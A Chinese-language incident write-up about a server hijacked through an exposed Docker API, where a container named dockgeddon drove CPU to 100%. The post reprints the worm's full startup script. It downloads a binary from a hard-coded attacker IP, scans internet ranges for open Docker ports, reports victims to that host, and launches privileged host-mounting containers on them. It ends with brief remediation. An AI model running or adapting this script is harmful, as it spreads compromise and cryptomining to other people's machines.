异常dockgeddon导致 cpu 100%

问题描述

1,收到钉钉告警,提示机器 cpu 使用率超过 90%

image-20210426164204141

2,然后登录监控找到对应的机器

image-20210426164445498

确实是 CPU 使用率到达百分之百了。

3,查看容器监控确定是哪个容器产生了问题(因为我这个机器上就运行了 docker)

image-20210426164645245

如果没有容器监控也可以使用docker stats来检查各个容器的资源消耗情况。

4,找到出问题的容器,发现并不是我们业务的容器,于是开始分析

分析出问题的 docker

查看 docker 的启动命令,发现他启动是执行内部的一个脚本

#!/bin/bash
RATE_TO_SCAN=500000


if type apt-get 2>/dev/null 1>/dev/null; then apt-get update --fix-missing 2>/dev/null 1>/dev/null; apt-get install -y wget curl jq bash masscan libpcap-dev ; fi
if type yum 2>/dev/null 1>/dev/null; then yum clean all 2>/dev/null 1>/dev/null; yum install -y wget curl jq bash masscan libpcap-devel ; fi
if ! type zgrab 2>/dev/null 1>/dev/null; then wget http://45.9.148.85/bin/zgrab -O /usr/bin/zgrab && chmod +x /usr/bin/zgrab ; fi
if ! type docker 2>/dev/null; then curl -sLk https://get.docker.com | bash ; fi
docker stop $(docker ps | grep -v 'CONTAINER' | grep -v 'tntpwner2\|b0rgdrone24\|dockgeddon' | awk '{print $1}')
clear ; echo "" ; echo ""
echo CgoKICAgICAgICBfX19fXyAgICAgICAgICAgICAgICAgICAgX19fX18gICAgX18gIF9fX19fICAgXyBfIF8gICAgICAgICAgICAgIAogICAgICAgL19fICAgXF9fXyAgX18gXyBfIF9fIF9fXy9fXyAgIFwvXCBcIFwvX18gICBcIHwgKF8pIHwgX19fX18gIF9fXyAgCiAgICAgICAgIC8gL1wvIF8gXC8gX2AgfCAnXyBgIF8gXCAvIC9cLyAgXC8gLyAgLyAvXC8gfCB8IHwgfC8gLyBfIFwvIF9ffCAKICAgICAgICAvIC8gfCAgX18vIChffCB8IHwgfCB8IHwgLyAvIC8gL1wgIC8gIC8gLyAgICB8IHwgfCAgIDwgIF9fL1xfXyBcIAogICAgICAgIFwvICAgXF9fX3xcX18sX3xffCB8X3wgfF9cLyAgXF9cIFwvICAgXC8gICAgIHxffF98X3xcX1xfX198fF9fXy8gCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIF8gICBfICAgICAgICAgICAgICBfX18gIF9fXyAgICBfXyAgICBfX18gICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICB8IHxffCB8X18gICBfX18gICAgLyBfX1wvIF8gXCAgL19fXCAgLyBfIFwgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgIHwgX198ICdfIFwgLyBfIFwgIC9fX1wvLyB8IHwgfC8gXC8vIC8gL19cLyAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgfCB8X3wgfCB8IHwgIF9fLyAvIFwvICBcIHxffCAvIF8gIFwvIC9fXFwgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgXF9ffF98IHxffFxfX198IFxfX19fXy9cX19fL1wvIFxfL1xfX19fLyAgICAgICAgICAgICAgICAgCgoKCgoK | base64 -d
sleep 6

chmod +x /usr/bin/zgrab
chmod +x /root/dockerd
chmod +x /root/TNTfeatB0RG

/root/TNTfeatB0RG
nice -n -20 /root/dockerd || /root/dockerd

dAPIpwn(){
range=$1
port=$2
rate=$3
rndstr=$(head /dev/urandom | tr -dc a-z | head -c 6 ; echo '')
eval "$rndstr"="'$(masscan $range -p$port --rate=$rate | awk '{print $6}'| zgrab --senders 200 --port $port --http='/v1.16/version' --output-file=- 2>/dev/null | grep -E 'ApiVersion|client version 1.16' | jq -r .ip)'";

for ipaddy in ${!rndstr}
do

TARGET=$ipaddy:$port

echo '##################################################'
curl -sLk http://45.9.148.85/input/da.php?vuln=$TARGET -o /dev/null
echo $TARGET

timeout -s SIGKILL 240 docker -H $TARGET run -d --net host --privileged --name dockgeddon -v /:/host mangletmpuser/dockgeddon

done
}

while true
do
RANGE=$(curl -sLk http://45.9.148.85/input/da_range.php)".0.0.0/8"
dAPIpwn $RANGE 2375 $RATE_TO_SCAN
dAPIpwn $RANGE 2376 $RATE_TO_SCAN
dAPIpwn $RANGE 2377 $RATE_TO_SCAN
dAPIpwn $RANGE 4244 $RATE_TO_SCAN
dAPIpwn $RANGE 4243 $RATE_TO_SCAN
done

一看这个启动脚本,就知道我的服务器被人家挖矿了。最后在Aqua网站博客上找到了相对应的信息

搬运博客内容

TeamTNT针对Docker和Kubernetes环境发起了一项新的战役。通过使用托管在Docker Hub中的一组容器映像,攻击者可以将配置错误的Docker守护程序,Kubeflow仪表板和Weave Scope定位为目标,利用这些环境来窃取云凭据,打开后门,挖掘加密货币并启动一种蠕虫。寻找下一个受害者。在此博客中,我将探索这些容器图像及其设计用途。

image-20210426170055475

我们就是因为把这个端口暴露在公网上被黑的。

解决办法

1,删除镜像

2,屏蔽上面的敏感端口对外提供访问